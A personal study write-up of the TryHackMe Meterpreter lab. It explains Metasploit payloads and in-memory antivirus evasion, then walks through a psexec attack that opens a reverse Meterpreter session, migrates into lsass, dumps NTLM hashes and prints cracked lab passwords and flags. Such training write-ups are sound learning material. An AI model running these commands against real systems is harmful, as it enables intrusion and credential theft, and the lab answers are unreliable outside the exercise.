Exploitation Basics

February 18, 2026 5 min read TryHackMe Facile

#Meterpreter #Metasploit #Meterpreter Metasploit

Meterpreter – My Study Notes

Task 1: Introduction to Meterpreter

When I studied this room, I understood that Meterpreter is an advanced payload inside the Metasploit Framework. It is mainly used during exploitation and post-exploitation.

Instead of just giving a simple shell, Meterpreter gives a powerful interactive environment that allows me to:

Interact with the target OS
Manage files
Execute commands
Dump hashes
Capture screenshots
Escalate privileges

Meterpreter runs on the target system as an agent and communicates back to my attacking machine through a command-and-control (C2) channel.

How Meterpreter Works (Important Concept)

One thing that stood out to me is that Meterpreter:

Does NOT install itself on the target.
Runs completely in memory (RAM).
Does not drop a file like meterpreter.exe on disk.

This is important because most antivirus software scans files written to disk. Since Meterpreter runs only in memory, it avoids simple file-based detection.

Also, communication between the victim machine and my attacking machine is usually encrypted (TLS).

If a company does not decrypt and inspect HTTPS traffic, IDS/IPS systems may not detect Meterpreter traffic.

However, I must remember:
Modern antivirus and EDR solutions can still detect Meterpreter.

Checking the Process (getpid and ps)

After exploitation, I can check which process Meterpreter is running inside:

meterpreter > getpid

This gives the PID (Process ID).

Then I can list all processes:

meterpreter > ps

I noticed that Meterpreter injects itself into legitimate processes (for example spoolsv.exe). So I will not see meterpreter.exe in the process list.

Even checking loaded DLLs does not clearly reveal Meterpreter.
This shows how stealthy it is.

Task 2: Meterpreter Flavors

Payloads in Metasploit are divided into:

Inline (Single)
Staged

Staged Payload

Delivered in 2 steps:

Small stager
Downloads full payload

Advantage → smaller initial payload.

Inline Payload

Delivered in one step (full payload at once).

Meterpreter supports both staged and stageless versions.

Listing Available Meterpreter Payloads

To see available versions:

msfvenom --list payloads | grep meterpreter

Meterpreter exists for many platforms:

Windows
Linux
Android
macOS
PHP
Python
Java
iOS

How I Choose the Correct Version

When selecting a Meterpreter payload, I consider:

Target OS (Windows? Linux? etc.)
Available components (Python installed? PHP server?)
Network restrictions (Is reverse TCP allowed? Only HTTPS?)

Sometimes exploits automatically choose a default payload, for example:

use exploit/windows/smb/ms17_010_eternalblue

I can list other compatible payloads with:

show payloads

Task 3: Meterpreter Commands

When I get a session, the first thing I should do is:

meterpreter > help

Each version of Meterpreter has different commands.

Commands are grouped into categories:

Core
File System
Networking
System
Privilege Escalation
Password database
Webcam / Audio
Timestomp

Most Important Commands (That I Should Remember)

Core

background → Send session to background
exit → Close session
help → Show commands
migrate → Move to another process
load → Load extension

File System

cd
ls
pwd
cat
search
upload
download

System

getuid → See which user I am
getpid
ps
sysinfo
shell
hashdump
getsystem

Important: Not all commands will work in every environment.

Task 4: Post-Exploitation with Meterpreter

This phase is very important.

Main goals:

Gather more information
Find credentials
Escalate privileges
Move laterally

getuid

meterpreter > getuid

This tells me which user I am running as.
If I see NT AUTHORITY\SYSTEM, that means I have high privileges.

ps

meterpreter > ps

Lists processes and their PIDs.

Very useful before using migrate.

migrate

meterpreter > migrate <PID>

This moves my Meterpreter session into another process.

Reasons to migrate:

More stable session
Hide inside trusted process
Capture keystrokes

Important note:
If I migrate from SYSTEM to a lower privilege process, I may lose privileges.

hashdump

meterpreter > hashdump

This dumps NTLM hashes from the SAM database.

Hashes can be:

Cracked
Used in Pass-the-Hash attacks

search

meterpreter > search -f secrets.txt

Very useful for finding flags or sensitive files.

shell

meterpreter > shell

Opens a normal Windows command shell.

Press CTRL + Z to return to Meterpreter.

Task 5: Post-Exploitation Challenge Notes

Step 1 – Using psexec

use exploit/windows/smb/psexec

Then set:

set RHOSTS 10.10.190.19
set SMBUser ballen
set SMBPass Password1
set LHOST 10.10.186.144
set LPORT 4444
exploit

After exploitation, I get a Meterpreter session.

Finding Computer Name

meterpreter > sysinfo

Computer name: ACME-TEST

Domain: FLASH

Background session:

background

Then:

use post/windows/gather/enum_shares
set SESSION 1
run

User-created share: speedster

Dumping jchambers NTLM Hash

Steps:

Return to session:

sessions -i 1

Check processes:

ps

Find lsass.exe PID
Migrate:

migrate 780

Dump hashes:

hashdump

NTLM hash: 69596c7aa1e8daee17f8e78870e25a5c

Cracked password: Trustno1

Finding secrets.txt

search -f secrets.txt

Location: c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

View content:

cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

Twitter password: KDSvbsw3849!

Finding realsecret.txt

search -f realsecret.txt

Location: c:\inetpub\wwwroot\realsecret.txt